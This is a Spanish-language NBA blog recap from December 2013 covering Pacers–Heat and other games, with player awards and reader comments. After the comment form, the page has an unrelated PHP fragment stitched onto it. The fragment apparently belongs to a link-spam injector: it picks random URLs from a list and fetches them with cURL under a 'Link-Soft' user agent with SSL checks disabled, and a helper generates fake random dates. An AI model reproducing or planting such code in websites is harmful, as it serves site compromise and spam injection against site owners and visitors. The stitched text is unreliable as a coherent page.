La Crónica: Aquí mandan los Pacers

11 de December de 2013 por Simon

Jornada con 8 partidos pero todos eclipsados por visita de Miami Heat al Bankers Life Fieldhouse de Indianapolis. Y es que después del duelo histórico que vivimos el año pasado todos teníamos ganas de rememorar aquella maravillosa serie y la verdad es que el partido no decepcionó. El resto de la jornada no trajo nada muy nuevo bajo el sol: otro ridículo de New York Knicks, segunda derrota de Lakers con Kobe al mando y vuelta triunfal de Deron Williams.

Los rivalidad que se está creando entre Miami e Indiana tiene pinta de recordarse dentro de muchos años. El partido de ayer comenzó con los Heat anotando con facilidad a un ritmo alto, consiguiendo ventajas importantes. Pero en el segundo cuarto Indiana ajustó su defensa  y comenzó una auténtica exhibición. Maniataron a los Heat y sólo las muchas pérdidas en ataque y el flojo partido de Paul George permitió a los campeones irse por delante al descanso. A falta de 4 minutos para el final del tercer cuarto, George se debió dar cuenta de que el partido había empezado y anotó su primera canasta en juego. A partir de ahí, el acierto desde el triple de George se unió a la exhibición de Hibbert, el saber hacer de West y la enorme defensa que ya venían practicando los Pacers desde el segundo cuarto. Indiana se puso en cabeza y a pesar de que Miami nunca bajo los brazos y no se descolgó, los visitantes no tuvieron ninguna opción real de llevarse el partido (84-90). Indiana ha demostrado en estos primeros partidos que es un aspirante legítimo, que ahora mismo está por encima de todos los equipos de la liga y que es el rival a batir de cara a llevarse la ventaja de campo en todos los Play Off.

Otro equipo que a pesar de las dudas sigue su ascenso y cada vez está más cerca de liderar el Oeste son los Thunder. Tras dar una buena paliza a los Pacers ayer tocaba viajar a Atlanta.  Liderados por Durant no dieron opción a la sorpresa y ya en el segundo cuarto pusieron tierra de por medio con unos Hawks que aunque lucharon hasta el final siempre se encontraban con un equipo mejor que los ponía donde quería (101-92). Con esta victoria los Thunder siguen empatados con los Spurs en la 2ª posición del Oeste. Los de San Antonio ayer vencieron a unos Raptors que todavía no pudieron contar con sus nuevas incorporaciones. San Antonio hizo lo que mejor sabe: jugar en equipo, y con 7 jugadores en dobles dígitos se llevó la victoria sin mayores problemas (116-103). 

Como decíamos en el encabezado, New York Knicks añadió la visita a Cleveland a su lista de ridículos. Los Cavs se apoyaron en Kyrie Irving al que le está costando encontrar su mejor baloncesto pero que ayer dio un recital y destrozó una vez tras otra la ¿defensa? de Knicks (94-109). Con esta victoria los Cavs, a pesar de estar realizando una temporada mediocre, se colocan muy cerca de los puestos de Play Off, empatados a victorias con Chicago Bulls que precisamente perdieron ayer contra el peor equipo del Este, Milwaukee Bucks. El gran momento de Henson y la confianza que está cogiendo Brandon Knight le bastaron a los Bucks para vencer a Chicago en su casa. A favor de Chicago hay que decir que sólo Carlos Boozer estaba disponible de su teórico quinteto titular pero eso no debe servir de excusa para hacer el ridículo anotando sólo 74 puntos en casa (78-74).

En el resto de partidos de la jornada, Lakers sumó su segunda derrota consecutiva desde que volvió Kobe, esta vez en casa y ante los Suns. Kobe fue el máximo anotador de los Lakers pero entre Goran Dragic, Eric Bledsoe y los hermanos Morris, Phoenix se llevó una victoria merecida que los vuelve a meter en Play Off (114-108). Un exitazo la temporada de Phoenix hasta ahora a pesar de no contar con su gran apuesta del draft Alex Len. Otra gran noticia fue el regreso de Deron Williams a la acción después de aproximadamente un mes de baja y al parecer lo ha hecho en buena forma puesto que fue el líder que llevó a los Nets a vencer a Boston Celtics con cierta comodidad  (96-104). ¿El comienzo del ascenso en la clasificación? Veremos. Nos dejamos para el final la paliza que propinaron los Wolves a Detroit Pistons. El partido ya estaba roto al descanso con un Kevin Love imperial y en la segunda mitad se tornó en abuso por parte de los visitantes en los que todo el mundo estuvo impecable (121-94).

PREMIOS

MVP: Festín el que se dio anoche Kyrie Irving con los Knicks. Les endosó 37 puntos a la vez que repartía 11 asistencias ante la atenta mirada de sus defensores. Kevin Love no se arrugó ante el juego interior de los Pistons y cogió 16 rebotes, pero es que además anotó 27 puntos y repartió 7 asistencias.

Rookie: Las bajas en los Bulls han dado minutos y visibilidad a Tony Snell que responde mostrando una capacidad defensiva a tener en cuenta de cara al futuro. Ayer, además, anotó 13 puntos que complementó con 6 rebotes, 3 asistencias y 2 tapones. Kentaviouis Caldwell-Pope se fue a los 16 puntos.

Sorpresa: John Henson tuvo minutos de sobra para demostrar su calidad y respondió con creces. 25 puntos, 14 rebotes, 3 robos y 6 tapones ante unos Bulls en horas bajas. En San Antonio, Aaron Baynes cubrió a la perfección la baja de Tiago Splitter. Acabó con 14 puntos y 6 rebotes.

Decepción: Volvió Deron Williams y Joe Johnson dejó una de sus peores actuaciones del año: 7 puntos con un 3 de 9 en tiros de campo y 3 pérdidas en 38 minutos. ¿Casualidad?

Esfuerzo en vano: Una vez más, Carmelo Anthony. El de los Knicks fue de lo más salvable de su equipo con 29 puntos y 8 rebotes.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

18 comentarios a esta entrada

  1. HisRoyalAirness dice:
    #1

    Tremendo air ball clutch de Lebron jujuju.

    Y el quinteto de Wolves necesita ayuda en serio, dan totalmente la talla pero el banco es un solar. Barea y otro por Ryan Anderson!

      Citar

  2. txusma dice:
    #2

    HisRoyalAirness:
    Tremendo air ball clutch de Lebron jujuju.

    Y el quinteto de Wolves necesita ayuda en serio, dan totalmente la talla pero el banco es un solar. Barea y otro por Ryan Anderson!

    Ya puede ser bueno el otro…

    Los Wolves acaban de traspasar a Derrick Williams por Mbah-a-Moute así que no se pueden quejar de que no tienen banquillo si lo que tenían tampoco lo aprovechaban

      Citar

  3. GreenPride dice:
    #3

    Bueno pues de ayer he visto el partidazo Pacers vs Heat. Los Pacers hicieron lo que vienen haciendo toda la temporada defender a muerte y aprovechar sus ventajas interiores y el gran momento de Paul George. Con Hibbert abusando de los interiores de los Heat y LeBron maniatado por la defensa de ayudas (Hibbert es el único jugador que haya visto que haga fallar sus entradas al rey) sólo las pérdidas propiciaron que el partido fuese igualado. Tras un primer cuarto bueno de Miami, Indiana fue ajustando su defensa hasta tomar la delantera en el juego y el marcador. Un conjunto temible los Pacers y los Heat que ven lo que les espera en los PO. Todavía queda mucho pero parece difícil que puedan hacer frente a Hibbert. Si no hay lesiones pueden darnos otra serie apasionante este año. Por lo Heat, necesidad de recuperar a Wade a mejor nivel y de alguien que por dentro pueda hacer frente a West&Hibbert. Por lo demás faltó un mejor partido en ataque de LeBron o del sus tiradores ya que ni Battier, ni Cole, ni Allen ni Chalmers estuvieron acertados

      Citar

  4. The wolf dice:
    #4

    Golden State Warriors incorporará a Hilton Armstrong, hasta ahora en la NBADL.

    ¿Alguien sabe algo acerca de este tío?

      Citar

  5. dunc dice:
    #5

    Mmmm, me suena de la epoca de New Orleans Hornets con Paul, West y Chandler, ¿no? Creo que era el pivot suplente de Chandler.

      Citar

  6. Denise dice:
    #6

    The wolf:
    Golden State Warriors incorporará a Hilton Armstrong, hasta ahora en la NBADL.

    ¿Alguien sabe algo acerca de este tío?

    Un paquete similar a Cedric Simmons pero mas alto y mas canijo.

      Citar

  7. The wolf dice:
    #7

    dunc:
    Mmmm, me suena de la epoca de New Orleans Hornets con Paul, West y Chandler, ¿no? Creo que era el pivot suplente de Chandler.

    estuvo de 2006 a 2010 en hornets… asi que lo has clavao

      Citar

  8. Denise dice:
    #8

    Se confirman los fichajes de Stephen Jackson por Clippers y de Chris Douglas-Roberts por Bobcats, este ultimo recuerdo que se cascó hace años un mes impresionante con los Nets y luego se perdió del mapa.

    La verdad es que te pones a pensar y hay jugadores que pasan de verlos en una cancha jugando de manera estable en las rotaciones, desaparecen por algo y nunca mas vuelves a oir hablar de ellos. Algunos importantes como Al Thornton, Johny Flynn, y otros relativamente interesantes Leon Powe, Sam Young, como Rodney Carney, Renaldo Balkman, Tyrus Thomas, Shelden Williams, un blanquito tirador que eligió Cleveland en un Draft, un melenas tipo Jordan Hill que estaba en los Nets y luego se fue a Sacramento y a Boston, uno de Denver que le pegó a Carmelo, Josh Boone,

      Citar

  9. Denise dice:
    #9

    Denise:
    Se confirman los fichajes de Stephen Jackson por Clippers y de Chris Douglas-Roberts por Bobcats, este ultimo recuerdo que se cascó hace años un mes impresionante con los Nets y luego se perdió del mapa.

    La verdad es que te pones a pensar y hay jugadores que pasan de verlos en una cancha jugando de manera estable en las rotaciones, desaparecen por algo y nunca mas vuelves a oir hablar de ellos. Algunos importantes como Al Thornton, Johny Flynn, y otros relativamente interesantes Leon Powe, Sam Young,como Rodney Carney,Renaldo Balkman, Tyrus Thomas, Shelden Williams, un blanquito tirador que eligió Cleveland en un Draft, un melenas tipo Jordan Hill que estaba en los Nets y luego se fue a Sacramento y a Boston, uno de Denver que le pegó a Carmelo,Josh Boone,

    Se me olvidó Childress, (el hombre de los 6 millones en Grecia) y Rashad McCants que estaba en Minny y recuerdo que se cascó un temporadón como 6º hombre y se zumbaba a Khloe Kardashian (la de Odom), ó los Raptors Joey Graham, Araujo y Jamario Moon, Adam Morrison, los ositos Hakim Warrick y Stromile Swift, Troy Bell (que lo fichó el Madrid y en una porra lo puse como MVP de la ACB jojo) , Robert Swift …..

      Citar

  10. Esteban dice:
    #10

    que me dicen que Josh Selby, un chaval que promedio en 8 juegos en la liga de desarrollo 25 puntos, luego de eso, fue MVP de la liga de verano junto a un tal Damian Lillard

    de alli tuvo unos juegos mas en la liga de desarrollo con suerte dispar, los Grizlies nunca le dieron una verdadera oportunidad y fue traspasado a los Cavs que lo cortaon sin que siquiera juege

    este tio quiza merecia una oportunidad

      Citar

  11. Denise dice:
    #11

    Esteban:
    que me dicen que Josh Selby, un chaval que promedio en 8 juegos en la liga de desarrollo 25 puntos, luego de eso, fue MVP de la liga de verano junto a un tal Damian Lillard

    de alli tuvo unos juegos mas en la liga de desarrollo con suerte dispar, los Grizlies nunca le dieron una verdadera oportunidad y fue traspasado a los Cavs que lo cortaon sin que siquiera juege

    este tio quiza merecia una oportunidad

    A lo mejor la cago, porque estoy hablando de memoria, pero me suena a que a Selby lo fichó hace meses el equipo de McGrady de la liga china para reemplazarlo. Mbenga creo que tambien juega en ese equipo.

      Citar

  12. Ruxixón dice:
    #12

    Young fue cortado por Spurs hace nada.En su día se hablaba bastante bien de este tio.Curioso el caso de Ty Thomas,para nada es tan paquete como para no tener un hueco en la NBA,a saber qué es de él después de la amnistía de Charlotte.Particularmente,aparte de Thomas,Leon Powe(jugador importante en los Celtics del Big Three con James Posey,otro que tal baila) y Moon son los jugadores que más recuerdo,quizás por su pasado en los Cavaliers.

      Citar

  13. Denise dice:
    #13

    Ruxixón:
    Young fue cortado por Spurs hace nada.En su día se hablaba bastante bien de este tio.Curioso el caso de Ty Thomas,para nada es tan paquete como para no tener un hueco en la NBA,a saber qué es de él después de la amnistía de Charlotte.Particularmente,aparte de Thomas,Leon Powe(jugador importante en los Celtics del Big Three con James Posey,otro que tal baila)y Moon son los jugadores que más recuerdo,quizás por su pasado en los Cavaliers.

    ¿Y de Al Thornton no? Este tio en sus primeros años, hacía partidacos de 20 puntos, es verdad que jugaba en la banda que eran los Clippers de aquellos años, pero no está mal. Es un caso rarisimo, supongo que tendrá lesiones o no andará muy bien de la azotea para haber acabado así.

      Citar

  14. HisRoyalAirness dice:
    #14

    Carmelo ha superado al Dr. J en la lista de máximos anotadores. Ahí es nada

      Citar

  15. Blade Petrovic dice:
    #15

    Y de Kelena Auzabike. Buen triplista que jugó en Denver. Un jugador 2k

      Citar

  16. rumbero dice:
    #16

    Blade Petrovic:
    Y de Kelena Auzabike. Buentriplista que jugó en Denver. Un jugador 2k

    Fue en los Warriors del ‘We believe’. El tío se jodió bien la rodilla en su mejor momento y estuvo como dos años sin jugar. Creo que Mavs y Cavs lo repescaron más tarde pero ni llegó a jugar con ellos o fue algo testimonial. Una pena.

      Citar

  17. txusma dice:
    #17

    HisRoyalAirness:
    Carmelo ha superado al Dr. J en la lista de máximos anotadores. Ahí es nada

    Trampa de la buena… 😉

    Carmelo ha superado a Erving en la lista de anotadores de la NBA pero es que el DR. J jugó muchos años en la ABA. Si miramos la lista de anotadores NBA+ABA, Erving es el 6º mejor de todos los tiempos con un poco má de 30000 puntos. Muchos le quedan a Carmelo todavía.

      Citar

  18. Vader dice:
    #18

    txusma: Trampa de la buena…

    Carmelo ha superado a Erving en la lista de anotadores de la NBA pero es que el DR. J jugó muchos años en la ABA. Si miramos la lista de anotadores NBA+ABA, Erving es el 6º mejor de todos los tiempos con un poco má de 30000 puntos. Muchos le quedan a Carmelo todavía.

    La verdad, ya me extrañaba… XD

    Que pena lo de Melo, la verdad yo creo que esta en el mejor momento de su carrera pero con el equipo que tenemos en los Knicks no podrá ni acercarse al anillo.

    Saludos

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>